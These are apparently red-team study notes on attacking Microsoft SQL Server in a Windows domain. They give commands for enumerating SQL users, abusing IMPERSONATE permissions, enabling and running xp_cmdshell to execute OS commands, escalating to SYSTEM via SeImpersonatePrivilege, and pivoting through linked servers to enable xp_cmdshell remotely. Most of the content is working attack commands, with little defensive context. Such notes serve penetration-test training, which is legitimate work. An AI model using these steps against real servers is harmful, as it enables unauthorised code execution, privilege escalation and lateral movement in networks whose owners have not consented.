MS SQL is a Microsoft relational database solution.

Users that do not have the public role may not directly see who’s also on the SQL Server. To enumerate SQL users using PowerSploit without a role:

# Enumerate possible SQL Server users
Get-DomainGroup -Identity *SQL* | % { Get-DomainGroupMember -Identity $_.distinguishedname | select groupname, membername }

Apart from PowerUpSQL and SQLRecon, mssqlclient.py (impacket) can also be used to run SQL statements:

# Password required
mssqlclient.py -windows-auth $DOMAIN/$USER@$SRV_IP

RCE via impersonation

09-lateral-movement03-execution See: PowerUpSQL, SQLRecon Look for users who may impersonate another (alternatively use SQLRecon).

# "grantee principal" may impersonate "grantor principal"
SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE';
# Look for the name associated with principals
SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals;
# Impersonate
EXECUTE AS login = '[domain]\[target-user]';

RCE via xp_cmdshell

02-initial-access 03-execution

xp_cmdshell is a MS SQL feature that is disabled by default, as it allows SQL users to run OS commands. It normally requires sysadmin permissions (and executes command under the SQL server account), unless the ##xp_cmdshell_proxy_account## credential is configured.

PowerUpSQL (sysadmin required; this enables xp_cmdshell then disables after execution):

Invoke-SQLOSCmd -Instance "[srv-fqdn],1433" -Command "whoami" -RawResults

Enable and use xp_cmdshell:

# Check if already enabled (value == 1)
SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';
# Enable if not already
sp_configure 'Show Advanced Options', 1; RECONFIGURE;
sp_configure 'xp_cmdshell', 1; RECONFIGURE;
# Run using xp_cmdshell
EXEC xp_cmdshell 'dir';
# Disable if not originally enabled
sp_configure 'xp_cmdshell', 0; RECONFIGURE;
sp_configure 'Show Advanced Options', 0; RECONFIGURE;

Privesc via SeImpersonatePrivilege

See: JuicyPotato and SweetPotato #ttp/05-privilege-escalation

SQL Server accounts have the SeImpersonatePrivilege. The use of JuicyPotato (and variants) can force a SYSTEM service into talking with SQL Server (think print spool exploit), which allows an attacker to impersonate SYSTEM.

09-lateral-movement02-initial-access “Links” allow an SQL Server to access data from another server instance (does not need to be in domain).

To list links:

SELECT srvname, srvproduct, rpcout FROM master..sysservers;

To run a query through a link:

xp_cmdshell cannot (normally) be re-enabled

Although xp_cmdshell can be used over a link if already enabled, it cannot be enabled over a link, since sp_configure can only be used if rpcout is enabled.

SELECT * FROM OPENQUERY("[link-srv-fqdn]", 'select @@servername');
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');

To enable xp_cmdshell when link has rpcout=true

-- square brackets required
EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [<link-srv-fqdn>]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [<link-srv-fqdn>]

Automatically enumerate links:

Get-SQLServerLinkCrawl -Instance "[srv-fqdn],1433"